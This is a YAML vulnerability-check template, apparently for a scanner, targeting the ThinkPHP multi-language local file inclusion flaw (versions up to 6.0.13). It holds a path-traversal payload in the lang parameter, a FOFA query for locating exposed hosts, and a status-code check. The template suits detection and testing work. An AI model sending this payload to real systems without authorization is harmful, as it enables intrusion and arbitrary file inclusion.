product: ThinkPHP
vName: ThinkPHP 多语言本地文件包含
type: 文件包含
vID: [ ]
level: 3
vDesc: ThinkPHP 是一个在中国使用较多的 PHP 框架。在其 6.0.13 版本及以前，存在一处本地文件包含漏洞。当多语言特性被开启时，攻击者可以使用 lang 参数来包含任意 PHP 文件。
version: ''
note: '利用请参考链接'
search:
  FOFA: app="ThinkPHP"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/开发框架漏洞/ThinkPHP 多语言本地文件包含漏洞.md
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /?lang=../../../../../public/index
    verify:
      path: ''
      logic: and
      check:
        - status: 500
          header:
            value:
              - text/html
            logic: and